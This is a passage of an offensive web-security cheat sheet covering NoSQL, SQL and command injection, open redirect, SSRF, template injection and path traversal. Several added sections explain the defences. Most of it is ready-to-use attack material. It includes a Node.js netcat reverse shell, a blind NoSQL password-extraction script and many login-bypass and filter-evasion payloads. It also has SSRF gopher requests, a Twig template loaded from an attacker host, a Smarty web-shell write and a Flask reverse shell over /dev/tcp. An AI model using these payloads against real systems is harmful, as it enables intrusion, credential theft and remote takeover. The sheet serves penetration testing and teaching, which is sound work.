var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
11. NoSQL injection
Exploit
Authentication bypass with $ne / $gt
in URL:
username[$ne]=toto&password[$ne]=toto
in JSON:
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
Finding the length
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
Extracting data
in URL:
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
or
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON:
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
Blind NoSQL injection
import string
import requests
import urllib3

urllib3.disable_warnings()

u = "https://target.example/login"  # target URL (placeholder; the original script left it undefined)
username = "admin"
password = ""
while True:
    found = False
    for c in string.printable:
        if c not in ['*', '+', '.', '?', '|']:  # regex metacharacters would match more than one char
            payload = '{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data={'ids': payload}, verify=False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password + c))
                password += c
                found = True
    if not found:  # no character extends the prefix: the whole value has been recovered
        break
print("Password: %s" % password)
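The payloads and the blind loop above can be run offline against a stand-in for the database, which makes it clear why `username[$ne]=toto` works and what the fix is. The following is an added example (not from the original notes): a bracket-notation body parser of the kind Express's qs provides, an in-memory matcher for `$eq`/`$ne`/`$regex`, a `login` with and without the "credentials must be plain strings" check, and the character-by-character `$regex` extraction. The user records are constructed.

```python
"""Operator injection against a MongoDB-style login and the blind $regex extraction loop, run
offline against an in-memory matcher. Added example, not from the original notes; USERS is
constructed and parse_body mimics qs bracket notation only as far as these payloads need."""
import re
import string
from urllib.parse import parse_qsl

USERS = [{"username": "admin", "password": "mdp"}, {"username": "bob", "password": "hunter2"}]


def parse_body(qs: str) -> dict:
    """username[$ne]=toto -> {"username": {"$ne": "toto"}}, like Express/qs does."""
    doc = {}
    for key, val in parse_qsl(qs):
        if key.endswith("]") and "[" in key:
            field, op = key[:-1].split("[", 1)
            doc.setdefault(field, {})[op] = val
        else:
            doc[key] = val
    return doc


def _match(value, cond) -> bool:
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$eq" and value != arg:
            return False
        if op == "$ne" and value == arg:
            return False
        if op == "$regex" and not re.search(arg, value):
            return False
        if op not in ("$eq", "$ne", "$regex"):
            raise ValueError(f"operator {op} not modelled")
    return True


def find_one(query: dict):
    for user in USERS:
        if all(_match(user.get(field), cond) for field, cond in query.items()):
            return user
    return None


def login(body: str, strict: bool = False):
    """strict=True is the fix: credentials must be plain strings, so no operator object reaches the query."""
    query = parse_body(body)
    if strict and not all(isinstance(v, str) for v in query.values()):
        return None
    return find_one(query)


def extract_password(username: str, alphabet: str = string.ascii_lowercase + string.digits) -> str:
    """The blind loop from the script above: extend the known prefix one character at a time."""
    found = ""
    while True:
        for ch in alphabet:
            query = {"username": {"$eq": username}, "password": {"$regex": "^" + re.escape(found + ch)}}
            if find_one(query):
                found += ch
                break
        else:
            return found  # nothing extends the prefix: the full value has been recovered
```

The strict check mirrors what mongo-sanitize or an explicit `String(req.body.password)` cast does; comparing a password hash instead of the stored password removes the `$regex` oracle entirely.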
MongoDB payloads
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
12. Open redirect
Exploit
1. Bypass an allow-list check: www.whitelisted.com.evil.com
2. Bypass a 'javascript' keyword blacklist with CRLF: java%0d%0ascript%0d%0a:alert(0)
3. Bypass an 'http' keyword blacklist with '//': //baidu.com
4. Bypass a '//' blacklist with 'https:': https:baidu.com
5. Bypass a '//' blacklist with '\/\/': \/\/baidu.com/ or /\/baidu.com/
6. Bypass a '.' blacklist with '%E3%80%82' (U+3002, ideographic full stop): //baidu%E3%80%82com
7. Bypass a blacklist with '%00': //baidu%00.com
8. Parameter pollution: ?next=whitelisted.com&next=baidu.com
9. Userinfo with '@': http://[email protected]/
10. Directory tricks: http://www.baidu.com/http://www.whitelisted.com/ and http://www.baidu.com/folder/www.whitelisted.com
11. XSS via the open URL (when it lands in a JS variable): ";alert(0);//
12. XSS via the data: scheme: http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
13. XSS via the javascript: scheme: http://www.example.com/redirect.php?url=javascript:prompt(1)
Common parameters
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
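Most of the bypasses in the list above target the same mistake: a substring or prefix check on the raw redirect parameter. The following is an added example (not from the original notes) that puts that naive check next to one that decodes the value, parses it, and compares the resulting host against an allow-list; the bypass payloads are fed through both. The allowed hosts are an assumption.

```python
"""Redirect-target validation: the substring check the bypass list defeats, next to an
allow-list check on the parsed host. Added example, not from the original notes; the
ALLOWED_HOSTS set is an assumption."""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"whitelisted.com", "www.whitelisted.com"}


def naive_allows(url: str) -> bool:
    """'Our domain appears somewhere in the value': payloads 1, 9 and 10 walk straight through."""
    return "whitelisted.com" in url


def strict_allows(url: str) -> bool:
    """Decode first, refuse characters browsers handle inconsistently, then judge the parsed host."""
    url = unquote(url)
    if any(ch in url for ch in "\r\n\t\x00\\"):
        return False  # CRLF/tab tricks (payload 2), NUL (payload 7), backslash slashes (payload 5)
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data: (payloads 12 and 13)
    if not parts.netloc:
        # a site-relative path is fine; '//host' and 'https:host' are not (payloads 3 and 4)
        return url.startswith("/") and not url.startswith("//")
    if parts.username is not None or parts.password is not None:
        return False  # http://whitelisted.com@evil (payload 9)
    host = (parts.hostname or "").rstrip(".")
    return host in ALLOWED_HOSTS
```

Returning a fixed path or an index into a server-side table of destinations avoids the whole problem; when a URL must be accepted, the parsed host check is the minimum.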
13. Remote command execution
Command separators
ps;ls
ps&ls
ps&&ls
ps|ls
fail_command||ls
Inline commands
other_command `cat /etc/passwd`
other_command $(cat /etc/passwd)
Bypassing space filters - Linux
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/80
IFS=,;`cat<<<uname,-a`
Bypassing space filters - Windows
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
Wildcards
Common wildcards: * ? [] [-] [^] [!] {str1,str2,…}
Character-class tricks: ...
/???/??t
/???/p??s??
Bypassing zsh/bash/sh restrictions
echo $0 -> /usr/bin/zsh
echo whoami|$0
Other bypasses
Single quotes: w'h'o'am'i
Double quotes: w"h"o"am"i
Backslashes and slashes: w\ho\am\i and /\b\i\n/////s\h
Using $@: who$@ami
Variable expansion:
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
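Every separator and space-bypass listed above only matters when the value reaches a shell. The following is an added example (not from the original notes) that runs the payloads against three versions of the same call: a string interpolated into `shell=True`, the same string with `shlex.quote`, and an argument vector behind an allow-list. `echo` stands in for the real command (a `ping` wrapper, say) so the demo runs anywhere with /bin/sh.

```python
"""Command injection via shell metacharacters, shown with subprocess: interpolated string with
shell=True, the same with shlex.quote, and an argv list behind an allow-list. Added example,
not from the original notes; `echo` stands in for the real command being wrapped."""
import re
import shlex
import subprocess

HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")  # hostnames/IPs only: no ; & | ` $ ( ) { } < > space newline


def run_vulnerable(host: str) -> str:
    """User input pasted into a shell command line: every separator above starts a second command."""
    return subprocess.run(f"echo pinging {host}", shell=True, capture_output=True, text=True).stdout


def run_quoted(host: str) -> str:
    """Still a shell, but the value is single-quoted so metacharacters and ${IFS} are literal."""
    return subprocess.run(f"echo pinging {shlex.quote(host)}", shell=True, capture_output=True, text=True).stdout


def run_safe(host: str) -> str:
    """Validate with an allow-list, then pass an argv list so no shell parses the value at all."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host {host!r}")
    return subprocess.run(["echo", "pinging", host], capture_output=True, text=True).stdout


def is_injected(output: str) -> bool:
    """The payloads below try to print INJECTED on its own line; that only happens if a second command ran."""
    return any(line.strip() == "INJECTED" for line in output.splitlines())


def rejected(host: str) -> bool:
    try:
        run_safe(host)
        return False
    except ValueError:
        return True
```

`shlex.quote` only covers POSIX shells; on Windows, and wherever the wrapped program itself interprets its arguments, the allow-list plus argv form is the one to rely on.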
14. SQL injection
- MSSQL injection
- MySQL injection
- Oracle SQL injection
- PostgreSQL injection
- SQLite injection
Detection characters
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
DBMS identification (boolean probes that only evaluate on the named engine)
["conv('a',16,2)=conv('a',16,2)","MYSQL"]
["connection_id()=connection_id()","MYSQL"]
["crc32('MySQL')=crc32('MySQL')","MYSQL"]
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"]
["@@CONNECTIONS>0","MSSQL"]
["@@CONNECTIONS=@@CONNECTIONS","MSSQL"]
["@@CPU_BUSY=@@CPU_BUSY","MSSQL"]
["USER_ID(1)=USER_ID(1)","MSSQL"]
["ROWNUM=ROWNUM","ORACLE"]
["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"]
["LNNVL(0=123)","ORACLE"]
["5::int=5","POSTGRESQL"]
["5::integer=5","POSTGRESQL"]
["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"]
["get_current_ts_config()=get_current_ts_config()","POSTGRESQL"]
["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"]
["current_database()=current_database()","POSTGRESQL"]
["sqlite_version()=sqlite_version()","SQLITE"]
["last_insert_rowid()>1","SQLITE"]
["last_insert_rowid()=last_insert_rowid()","SQLITE"]
["val(cvar(1))=1","MSACCESS"]
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"]
["cdbl(1)=cdbl(1)","MSACCESS"]
["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
Automated attack with sqlmap
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
Authentication bypass
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Authentication bypass (raw MD5)
Example: "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
We only need an input whose raw MD5 digest contains ' or '<something truthy>:
md5("ffifdyop", true) starts with the bytes 'or'6 followed by 11 non-printable bytes, so the query becomes pass = '' or '6...' and MySQL evaluates the string '6...' as the number 6, i.e. true.
WAF bypass
Whitespace alternatives
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
Comments
?id=1/*comment*/and/**/1=1/**/--
Parentheses
?id=(1)and(1)=(1)--
Without commas
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1)
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
Equivalents
AND -> &&
OR -> ||
= -> LIKE, REGEXP, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
Without information_schema.tables (MySQL 5.6 and later)
select * from mysql.innodb_table_stats;
select @@innodb_version;
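The authentication-bypass payloads, the DBMS probes and the raw-MD5 trick can all be checked against a throwaway database. The following is an added example (not from the original notes) that runs them on an in-memory SQLite table: the concatenated login query next to its parameterised form, a fingerprint routine that feeds a few of the probes from the table above through the injection point, and the `ffifdyop` digest prefix. The users table is constructed.

```python
"""SQL injection against a login query on an in-memory SQLite database: string concatenation
versus bound parameters, DBMS fingerprinting through the injection point, and the raw-MD5 trick.
Added example, not from the original notes; the users table is constructed."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [("admin", "S3cret!"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, user: str, pwd: str):
    """The query shape that admin' -- and ' or 1=1-- target."""
    sql = f"SELECT username FROM users WHERE username = '{user}' AND password = '{pwd}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user: str, pwd: str):
    """Bound parameters: the quote in the payload is data, never syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


PROBES = {  # a few of the boolean probes from the table above; only the native one evaluates without error
    "MYSQL": "connection_id()=connection_id()",
    "MSSQL": "@@CONNECTIONS=@@CONNECTIONS",
    "POSTGRESQL": "pg_client_encoding()=pg_client_encoding()",
    "SQLITE": "sqlite_version()=sqlite_version()",
}


def fingerprint(db) -> str:
    """Inject each probe as x' OR <probe> -- ; the engine that returns a row instead of an error is the one in use."""
    for dbms, probe in PROBES.items():
        try:
            if login_vulnerable(db, f"x' OR {probe} -- ", "x") is not None:
                return dbms
        except sqlite3.Error:
            continue
    return "UNKNOWN"


def raw_md5_prefix() -> bytes:
    """md5('ffifdyop', true) begins with 'or'6 , turning pass = '<raw md5>' into pass = '' or '6...'."""
    return hashlib.md5(b"ffifdyop").digest()[:5]
```

The `-- ` payloads carry a trailing space because MySQL requires one after `--`; SQLite and PostgreSQL do not, so it is the form that works everywhere.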
15. SSRF
Exploit
SSRF can be used to reach internal Redis, Discuz, FastCGI, uWSGI, memcached, Struts2, internal systems, Docker, Kubernetes, Hadoop, MySQL and so on.
1. Basic
http://localhost:80
http://0.0.0.0:22
2. Via DNS
Set a subdomain's DNS A record to the internal IP to probe, e.g. 127.0.0.1:
http://wwww.example.com/index.php?url=http://ssrf.w2n1ck.com
3. Via file upload
Change "type=file" to "type=url" and supply the internal address.
4. XSS
http://brutelogic.com.br/poc.svg -> simple alert
http://wwww.example.com/index.php?url=http://brutelogic.com.br/poc.svg
Bypass
1. Use HTTPS
https://localhost/
2. Use [::]
http://[::]:80/
http://0000::1:80/
3. Use DNS names that resolve to loopback
localtest.me
127.0.0.1.xip.io
www.owasp.org.127.0.0.1.xip.io
customer1.app.localhost.my.company.127.0.0.1.nip.io
4. Use the whole 127.0.0.0/8 range (I am not sure whether this needs some configuration; I did not get it to work)
127.x.x.x
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://mail.ebc.apple.com => 127.0.0.6 => localhost
5. Use malformed URLs
localhost:+11211aaa
localhost:00011211aaaa
Reference: https://low-level.readthedocs.io/en/latest/documents/SSRFbible.Cheatsheet.pdf
6. Use other number bases (hexadecimal, octal, decimal)
115.239.210.26 >>> 16373751032 (octal)
Convert each octet to hex (73 ef d2 1a), then convert 73efd21a as a single number to octal. Prefix the octal form with a 0 when requesting it (one or several zeros, like the extra zeros used to get past XSS filters); prefix the hex form with 0x.
http://127.0.0.1 >>> http://0177.0.0.1/
http://127.0.0.1 >>> http://2130706433/
http://192.168.0.1 >>> http://3232235521/
http://192.168.1.1 >>> http://3232235777/
7. Use the special address
http://0/
8. Use @
http://[email protected]
http://wwww.example.com\x40www.baidu.com
http://wwww.example.com%40www.baidu.com
Combination trick (different libraries pick different hosts from the same URL):
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 + httplib: 1.1.1.1
requests + browsers: 2.2.2.2
urllib: 3.3.3.3
9. Use enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
10. Abuse URL parser differences
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
Reference: https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
11. Use other protocols
file://
file:///etc/passwd
file://\/\/etc/passwd
dict://
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
sftp://
ssrf.php?url=sftp://example.com:11111/
tftp://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
ldap://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
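The number-base, short-form and `[::]` spellings in the bypass list all defeat the same defence: an SSRF filter that compares the host string (or `ipaddress.ip_address(host)`) against a deny-list before the HTTP client resolves it with `inet_aton` semantics. The following is an added example (not from the original notes) that normalises the host the way the client will, checks the result against loopback and private ranges, and refuses non-HTTP schemes. `FAKE_DNS` is a constructed stand-in for resolution so the block runs offline; the entries for localtest.me and the xip.io name reflect how those services really resolve.

```python
"""IP-literal normalisation for SSRF checks: every host form in the bypass list resolves to a
loopback or private address once it goes through inet_aton, while ipaddress.ip_address()
rejects most of the spellings and a naive check therefore treats them as hostnames.
Added example, not from the original notes; FAKE_DNS is a constructed stand-in for DNS."""
import ipaddress
import socket
from typing import Optional
from urllib.parse import urlsplit

BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

# constructed resolver table; localtest.me and *.127.0.0.1.xip.io really do answer 127.0.0.1
FAKE_DNS = {
    "localtest.me": "127.0.0.1",
    "www.owasp.org.127.0.0.1.xip.io": "127.0.0.1",
    "example.com": "93.184.216.34",
}


def canonical_ipv4(host: str) -> Optional[str]:
    """Accept the inet_aton spellings: decimal 2130706433, octal 0177.0.0.1, hex 0x7f000001, short 127.1."""
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return None


def naive_is_internal(host: str) -> bool:
    """Recognises only canonical dotted-quad / RFC 4291 text; the alternate spellings fall through as 'hostnames'."""
    try:
        return any(ipaddress.ip_address(host) in net for net in BLOCKED)
    except ValueError:
        return False


def is_internal(host: str, resolver=FAKE_DNS.get) -> bool:
    """Normalise literals the way the HTTP client will, resolve names, and judge the resulting address."""
    host = host.strip("[]").lower()
    literal = canonical_ipv4(host)
    if literal is None:
        try:
            ipaddress.ip_address(host)
            literal = host  # IPv6 literal such as :: or ::1
        except ValueError:
            literal = resolver(host)  # hostname: check the answer, not the name
            if literal is None:
                return True  # unresolvable: fail closed
    return any(ipaddress.ip_address(literal) in net for net in BLOCKED)


def url_targets_internal(url: str, resolver=FAKE_DNS.get) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True  # gopher://, dict://, file:// and friends are refused outright
    return is_internal(parts.hostname, resolver)
```

Even this check is only sound if the client connects to the address that was checked: resolve once, validate, and connect to that IP (with the original Host header), and do not follow redirects without re-validating, or DNS rebinding and a 302 to http://127.0.0.1 undo the work.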
Tools
SSRFmap - https://github.com/swisskyrepo/SSRFmap
Gopherus - https://github.com/tarunkant/Gopherus
http://blog.w2n1ck.com/ip.py
16. SSTI
Ruby (ERB)
<%= 7 * 7 %> => 49
<%= File.open('/etc/passwd').read %> => cat /etc/passwd
<%= Dir.entries('/') %> => ls /
Java (the T(...) forms are Spring Expression Language)
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
Environment variables:
${T(java.lang.System).getenv()}
Read /etc/passwd:
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Twig
{{7*7}} == {{7*'7'}} == 49
Command execution:
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Smarty
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Jinja2
{{4*4}}[[5*5]]
{{7*'7'}} => 7777777
Enumerate the classes available:
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
Dump the config variables:
{% for key, value in config.iteritems() %} <dt>{{ key|e }}</dt> <dd>{{ value|e }}</dd> {% endfor %}
Read a file (''.__class__.__mro__[2].__subclasses__()[40] is the file class on Python 2; on Python 3 the MRO of str is (str, object) and the index depends on what is loaded, so locate the class by name):
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
Write a file:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/hello.txt', 'w').write('Hello here !') }}
Reverse shell (Flask)
1. Write a config file:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
2. Load it:
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
3. Connect back:
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
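The Jinja2 payloads above are plain Python attribute access dressed up in template syntax, which is why the version-specific index matters so much. The following is an added example (not from the original notes, and not a Jinja2 run) that performs the same walk in Python: it searches `object`'s subclass tree by name instead of by index, reaches `_io.FileIO` (the Python 3 counterpart of the `file` class at index 40) to read a path, and reaches `subprocess.Popen` without naming the module, which is what the `config['RUNCMD']` step achieves. The temporary file is created by the example itself.

```python
"""The object walk behind the Jinja2 payloads, in plain Python: ''.__class__.__mro__[2] and the
index 40 are Python 2 specifics, so the gadget is located by name. Added example, not from the
original notes and not a Jinja2 run; the temporary file it reads is created here."""
import subprocess
import tempfile


def find_class(name: str):
    """Depth-first search of object's subclass tree; this is what __subclasses__()[N] indexes into.
    type.__subclasses__(cls) is used because `type` itself is one of the subclasses visited."""
    stack = [object]
    seen = set()
    while stack:
        cls = stack.pop()
        for sub in type.__subclasses__(cls):
            if sub in seen:
                continue
            seen.add(sub)
            if sub.__name__ == name:
                return sub
            stack.append(sub)
    return None


def read_file(path: str) -> str:
    """Python 3 stand-in for the Python 2 `file` class: _io.FileIO opens arbitrary paths."""
    return find_class("FileIO")(path).read().decode()


def run(cmd) -> str:
    """subprocess.Popen reached without importing it by name, which is the point of the RUNCMD step."""
    popen = find_class("Popen")
    return popen(cmd, stdout=subprocess.PIPE).communicate()[0].decode().strip()


def write_and_read_back(text: str) -> str:
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(text)
    return read_file(fh.name)
```

Jinja2's sandboxed environment blocks the `__class__`/`__mro__`/`__subclasses__` attributes this walk needs; rendering user input with the default environment does not.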
Tools
Tplmap - https://github.com/epinna/tplmap
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
17. CSTI (client-side template injection)
AngularJS
$eval('1+1')
{{1+1}}
Vue.js
{{constructor.constructor('alert(1)')()}}
18. Directory traversal
1. Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2. Unicode encoding
. = %u002e
/ = %u2215
\ = %u2216
3. Double URL encoding
. = %252e
/ = %252f
\ = %255c
4. Overlong UTF-8 encoding (invalid sequences that lenient decoders still accept)
. = %c0%2e, %e0%40%ae, %c0ae
